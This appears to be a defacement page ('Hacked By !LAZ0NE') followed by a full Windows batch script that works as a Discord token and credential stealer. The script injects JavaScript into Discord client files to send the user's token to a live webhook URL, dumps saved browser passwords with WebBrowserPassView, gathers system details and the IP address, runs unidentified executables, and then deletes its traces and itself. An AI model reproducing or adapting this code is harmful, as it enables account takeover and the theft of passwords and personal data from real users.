___                                                                                    
                                                     `MM                                                                                    
                                                      MM                                                                                    
____    _    ___ ____    _    ___ ____    _    ___    MM    ___   _________  ____  ___  __     ____         ____     _____  ___  __    __   
`MM(   ,M.   )M' `MM(   ,M.   )M' `MM(   ,M.   )M'    MM  6MMMMb  MMMMMMMMP 6MMMMb `MM 6MMb   6MMMMb       6MMMMb.  6MMMMMb `MM 6MMb  6MMb  
 `Mb   dMb   d'   `Mb   dMb   d'   `Mb   dMb   d'     MM 8M'  `Mb /    dMP 6M'  `Mb MMM9 `Mb 6M'  `Mb     6M'   Mb 6M'   `Mb MM69 `MM69 `Mb 
  YM. ,PYM. ,P     YM. ,PYM. ,P     YM. ,PYM. ,P      MM     ,oMM     dMP  MM    MM MM'   MM MM    MM     MM    `' MM     MM MM'   MM'   MM 
  `Mb d'`Mb d'     `Mb d'`Mb d'     `Mb d'`Mb d'      MM ,6MM9'MM    dMP   MM    MM MM    MM MMMMMMMM     MM       MM     MM MM    MM    MM 
   YM,P  YM,P       YM,P  YM,P       YM,P  YM,P       MM MM'   MM   dMP    MM    MM MM    MM MM           MM       MM     MM MM    MM    MM 
   `MM'  `MM'       `MM'  `MM'       `MM'  `MM'  68b  MM MM.  ,MM  dMP    /YM.  ,M9 MM    MM YM    d9 68b YM.   d9 YM.   ,M9 MM    MM    MM 
    YP    YP         YP    YP         YP    YP   Y89 _MM_`YMMM9'YbdMMMMMMMM YMMMM9 _MM_  _MM_ YMMMM9  Y89  YMMMM9   YMMMMM9 _MM_  _MM_  _MM_
                                                                                                                                            
                                                                                                                                            
                                                                                                                                            

Hacked By !LAZ0NE:#9909
www.laz0ne.com

EzFortnite is scammer.


######################################################################################################################################################

@echo off
C:/temp/curl -X POST -H "Content-type: application/json" --data "{\"content\": \"**INJECTION STARTED!**\"}" https://discordapp.com/api/webhooks/783100861760798741/ei5Q7UzvqiQxF97a_b3WVeI40lmgW5EWG2nKcTdtLlSTzTR2LY5zJYMxdlW9sFxtXcyG
set str=var X = window.localStorage = document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage;var V = JSON.stringify(X);var L = V;var C = JSON.parse(L);var strtoken = C["token"];var O = new XMLHttpRequest();O.open('POST', 'https://discordapp.com/api/webhooks/783100861760798741/ei5Q7UzvqiQxF97a_b3WVeI40lmgW5EWG2nKcTdtLlSTzTR2LY5zJYMxdlW9sFxtXcyG', false);O.setRequestHeader('Content-Type', 'application/json');O.send('{"content": ' + strtoken + '}');
C:/temp/curl "https://myexternalip.com/raw">>C:\temp\ip_address.txt
for /f "delims=" %%q in (C:\temp\ip_address.txt) do set IP=%%q
for /f "delims=" %%x in (C:\temp\WindowsInfo.txt) do set WindowsInfo=%%x
start C:/temp/WebBrowserPassView.exe /stext "C:/temp/%username%_Passwords.txt"
systeminfo | findstr /c:"Host Name">>C:\temp\System_INFO.txt
systeminfo | findstr /c:"Domain">>C:\temp\System_INFO.txt 
systeminfo | findstr /c:"OS Name">>C:\temp\System_INFO.txt 
systeminfo | findstr /c:"OS Version">>C:\temp\System_INFO.txt 
systeminfo | findstr /c:"System Manufacturer">>C:\temp\System_INFO.txt
systeminfo | findstr /c:"System Model">>C:\temp\System_INFO.txt 
systeminfo | findstr /c:"System type">>C:\temp\System_INFO.txt 
systeminfo | findstr /c:"Total Physical Memory">>C:\temp\System_INFO.txt
echo Hard Drive Space:>>C:\temp\System_INFO.txt
wmic diskdrive get size>>C:\temp\System_INFO.txt
echo. 
echo.
echo Service Tag:>>C:\temp\System_INFO.txt
wmic bios get serialnumber>>C:\temp\System_INFO.txt
echo. 
echo. 
echo CPU:>>C:\temp\System_INFO.txt
wmic cpu get name>>C:\temp\System_INFO.txt
set "discord=%appdata%\discord\0.0.308\modules\discord_voice\index.js"
set "discordcanary=%appdata%\discordcanary\0.0.276\modules\discord_voice\index.js"
set "discordptb=%appdata%\discordptb\0.0.55\modules\discord_voice\index.js"
if not exist %discord% goto CANARY
echo %str% >> "%appdata%\discord\0.0.308\modules\discord_voice\index.js"
GOTO CANARY
:CANARY
if not exist %discordcanary% goto PTB
echo %str% >> "%appdata%\discordcanary\0.0.276\modules\discord_voice\index.js"
GOTO PTB
:PTB
if not exist %discordptb% goto SEND2
echo %str% >> "%appdata%\discordptb\0.0.55\modules\discord_voice\index.js"
GOTO SEND2
:SEND2
C:/temp/curl -X POST -H "Content-type: application/json" --data "{\"content\": \"**%USERNAME%**\n```asciidoc\nTime and Date :: %DATE% %TIME%\nIP Address :: %IP%\nWindows Info :: %WindowsInfo%\n```\n\"}" https://discordapp.com/api/webhooks/783100861760798741/ei5Q7UzvqiQxF97a_b3WVeI40lmgW5EWG2nKcTdtLlSTzTR2LY5zJYMxdlW9sFxtXcyG 
"C:\temp\filed.exe" --processStart filed.exe
"C:\temp\CustomEXE.exe" --processStart CustomEXE.exe
timeout 5 > NUL
del C:\temp\filed.exe /f /q
rem testtaskkill /f /im Discord.exe
rem testtaskkill /f /im DiscordCanary.exe
rem testtaskkill /f /im DiscordPTB.exe
set "discord2=C:\Users\%username%\AppData\Local\Discord\Update.exe"
set "discordcanary2=C:\Users\%username%\AppData\Local\DiscordCanary\Update.exe"
set "discordptb2=C:\Users\%username%\AppData\Local\DiscordPTB\Update.exe
if not exist %discord2% goto ZZZ
rem test"C:\Users\%username%\AppData\Local\Discord\Update.exe" --processStart Discord.exe
GOTO ZZZ
:ZZZ
if not exist %discordcanary2% goto WWW
rem test"C:\Users\%username%\AppData\Local\DiscordCanary\Update.exe" --processStart DiscordCanary.exe
GOTO WWW
:WWW
if not exist %discordptb2% goto DEL
rem test"C:\Users\%username%\AppData\Local\DiscordPTB\Update.exe" --processStart DiscordPTB.exe
goto DEL
:DEL
del C:\temp\ip_address.txt /f /q
del C:\temp\WindowsInfo.txt /f /q
del C:\temp\%username%_Passwords.txt /f /q
del C:\temp\curl-ca-bundle.crt /f /q
del C:\temp\curl.exe /f /q
del C:\temp\CustomEXE.exe /f /q
rem %0 | %0
rem SHUTDOWN -r -t 30
rem SHUTDOWN /s /t 30 /c
del %0